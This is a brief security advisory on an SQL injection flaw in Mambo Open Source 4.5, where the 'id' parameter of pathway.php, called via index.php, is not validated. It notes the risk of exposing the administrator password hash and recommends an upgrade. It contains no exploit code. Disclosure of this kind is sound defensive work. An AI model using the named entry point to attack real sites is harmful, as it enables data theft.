It has been reported that the Mambo 'index.php' script is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input.
As a result of this a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.
Mambo Open Source index.php id Parameter SQL Injection
Remote / Network Access
Loss of Confidentiality,
Loss of Integrity
Mambo Open Source 4.5 contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "id" variable in the "pathway.php" module (called via index.php) is not verified properly and will allow an attacker to inject or manipulate SQL queries.
Upgrade to version 1.0.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.